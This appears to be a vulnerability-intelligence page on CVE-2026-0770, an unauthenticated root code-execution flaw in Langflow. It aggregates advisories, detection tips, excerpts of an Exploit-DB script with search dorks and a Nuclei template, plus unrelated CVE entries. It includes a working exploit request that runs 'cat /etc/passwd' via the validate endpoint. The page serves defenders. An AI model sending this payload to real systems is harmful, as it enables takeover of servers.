CVE-2026-0770
published 2026-01-23CVE-2026-0770: Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers…
PriorityP191critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
10.37%
95.2th percentile
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| langflow | langflow | — | — |
| langflow | langflow | 0 – 1.7.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /api/v1/validate/code HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
{"code":"\ndef exploit(\n _=( lambda r: (_ for _ in ()).throw(Exception(f\"OUTPUT:\\n{r.stdout}{r.stderr}\")) )(\n __import__('subprocess').run('cat /etc/passwd', shell=True, capture_output=True, text=True)\n )\n):\n pass\n"}
yara
id: CVE-2026-0770 info: name: Langflow < 1.3.0 - Remote Code Execution via validate_code() exec() author: affix severity: critical tags: cve,cve2026,langflow,rce,authenticated,vuln,vkev
- →Monitor for POST requests to /api/v1/validate/code containing '__import__' or 'subprocess' in the JSON body, which is the exploit payload pattern used to achieve RCE via the exec_globals parameter. ↗
- →Detect unauthenticated exploitation attempts by monitoring GET requests to /api/v1/auto_login followed immediately by POST requests to /api/v1/validate/code — this two-step sequence is the unauthenticated RCE attack chain. ↗
- →Alert on Authorization headers using the misspelled bearer scheme 'Bearare' (not 'Bearer'), which is a fingerprint of the known exploit tool for CVE-2026-0770. ↗
- →The Nuclei PoC template matches a successful exploit by checking the HTTP response body for the regex 'root:.*:0:0:' (contents of /etc/passwd), indicating confirmed RCE as root. ↗
- →Authentication is not required to exploit this vulnerability; Langflow enables unauthenticated auto-login by default, so a single unauthenticated request is sufficient to obtain a valid session token before proceeding with exploitation. ↗
- →The vulnerable endpoint is /api/v1/validate/code; the flaw exists within the handling of the exec_globals parameter provided to the validate endpoint, allowing inclusion of functionality from an untrusted control sphere. ↗
- ·The exploit works without authentication only when Langflow's auto-login feature is enabled (the default configuration). If auto-login is disabled, credentials are required, reducing the attack surface. ↗
- ·Successful exploitation results in code execution in the context of root, meaning the Langflow process itself runs as root — a significant privilege escalation risk that amplifies impact. ↗
- ·The exploit script defaults to the 'id' command if no command is specified, and the PoC template uses 'cat /etc/passwd' — defenders should watch for these specific commands in process trees spawned by Langflow. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Langflow affected by Remote Code Execution via validate_code() exec()
osv·2026-01-23
CVE-2026-0770 [HIGH] Langflow affected by Remote Code Execution via validate_code() exec()
Langflow affected by Remote Code Execution via validate_code() exec()
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
GHSA
Langflow affected by Remote Code Execution via validate_code() exec()
ghsa·2026-01-23
CVE-2026-0770 [HIGH] CWE-829 Langflow affected by Remote Code Execution via validate_code() exec()
Langflow affected by Remote Code Execution via validate_code() exec()
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
VulnCheck
langflow langflow Inclusion of Functionality from Untrusted Control Sphere
vulncheck·2026·CVSS 9.8
CVE-2026-0770 [CRITICAL] langflow langflow Inclusion of Functionality from Untrusted Control Sphere
langflow langflow Inclusion of Functionality from Untrusted Control Sphere
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Affected: langflow langflow
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product
Red Hat
cups: OpenPrinting CUPS: Denial of Service via path traversal in RSS notifier
vendor_redhat·2026-04-03·CVSS 6.5
CVE-2026-34978 [MEDIUM] CWE-22 cups: OpenPrinting CUPS: Denial of Service via path traversal in RSS notifier
cups: OpenPrinting CUPS: Denial of Service via path traversal in RSS notifier
OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.16 and prior, the RSS notifier allows .. path traversal in notify-recipient-uri (e.g., rss:///../job.cache), letting a remote IPP client write RSS XML bytes outside CacheDir/rss (anywhere that is lp-writable). In particular, because CacheDir is group-writable by default (typically root:lp and mode 0770), the notifier (running as lp) can replace root-managed state files via temp-file + rename(). This PoC clobbers CacheDir/job.cache with RSS XML, and after restarting cupsd the scheduler fails to parse the job cache and previously queued jobs disappear. At time of publication, there are no publicly a
No detection rules found.
Exploit-DB
Langflow 1.3.0 - Remote Code Execution
exploitdb·2026-05-29·CVSS 9.8
CVE-2026-0770 [CRITICAL] Langflow 1.3.0 - Remote Code Execution
Langflow 1.3.0 - Remote Code Execution
---
# Exploit Title: Langflow 1.3.0 - Remote Code Execution
# Fofa-dork: title="Langflow"
# Shodan-dork: title:"Langflow"
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Venodor Homepage: https://www.langflow.org/
# Software Link: https://github.com/langflow-ai/langflow
# Version: 1.2.0
# Tested on: Debian
# CVE : CVE-2026-0770
# Description: Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
# Usage: CVE-2026-0770.py -u 127.0.0.1 [-l USERNAME] [-p PASSWORD] [-c COMMAND]
import httpx
import asyncio
import subprocess
import json
import sys
im
Nuclei
Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
nuclei·CVSS 9.8
CVE-2026-0770 [CRITICAL] Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
Template:
id: CVE-2026-0770
info:
name: Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
author: affix
severity: critical
description: |
Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
impact: |
Remote attackers can execute arbitrary code as
Hackernews
Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
blogs_hackernews·2026-06-10·CVSS 8.8
CVE-2026-5027 [HIGH] Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
A high-severity unpatched security flaw in Langflow, an open-source low-code platform to build artificial intelligence (AI) applications, has come under active exploitation in the wild, according to findings from VulnCheck.
The vulnerability in question is CVE-2026-5027 (CVSS score: 8.8), a case of path traversal that could allow an attacker to write files to arbitrary locations.
"The 'POST /api/v2/files' endpoint does not sanitize the 'filename' parameter from the multipart form data, allowing an attacker to write files to arbitrary locations on the fi
Bleepingcomputer
Path traversal flaw in AI dev platform Langflow exploited in attacks
blogs_bleepingcomputer·2026-06-10·CVSS 9.8
CVE-2026-5027 [CRITICAL] Path traversal flaw in AI dev platform Langflow exploited in attacks
## Path traversal flaw in AI dev platform Langflow exploited in attacks
## Bill Toulas
CVE-2026-5027 is a high-severity path traversal flaw in Langflow's file upload functionality that fails to properly sanitize user-supplied filenames.
"The 'POST /api/v2/files' endpoint does not sanitize the 'filename' parameter from the multipart form data, allowing an attacker to write files to arbitrary locations on the filesystem using path traversal sequences ('../')," explains Tenable , which discovered the flaw at the start of the year.
Tenable publicly disclosed the issue on March 27, 2026, more than two months after initially reporting it to the Langflow team without receiving a response.
Although Tenable did not mention a fix in its advisory, Snyk Security reported on March 30, 2026, that t
Wiz
CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-0770 [CRITICAL] CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0770 :
Homebrew vulnerability analysis and mitigation
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Source : NVD
## 9.8
Score
Published January 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
LangFlow
Has Public
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Wiz
CVE-2026-34978 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34978 [MEDIUM] CVE-2026-34978 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34978 :
OpenPrinting CUPS vulnerability analysis and mitigation
OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.16 and prior, the RSS notifier allows .. path traversal in notify-recipient-uri (e.g., rss:///../job.cache), letting a remote IPP client write RSS XML bytes outside CacheDir/rss (anywhere that is lp-writable). In particular, because CacheDir is group-writable by default (typically root:lp and mode 0770), the notifier (running as lp) can replace root-managed state files via temp-file + rename(). This PoC clobbers CacheDir/job.cache with RSS XML, and after restarting cupsd the scheduler fails to parse the job cache and previously queued jobs disappear. At time of publication, there are no publicly av
Wiz
CVE-2026-23893 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-23893 [MEDIUM] CVE-2026-23893 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23893 :
NixOS vulnerability analysis and mitigation
openCryptoki is a PKCS#11 library and provides tooling for Linux and AIX. Versions 2.3.2 and above are vulnerable to symlink-following when running in privileged contexts. A token-group user can redirect file operations to arbitrary filesystem targets by planting symlinks in group-writable token directories, resulting in privilege escalation or data exposure. Token and lock directories are 0770 (group-writable for token users), so any token-group member can plant files and symlinks inside them. When run as root, the base code handling token directory file access, as well as several openCryptoki tools used for administrative purposes, may reset ownership or permissions on existing files inside the token directories. An attack
2026-01-23
Published
Exploited in the wild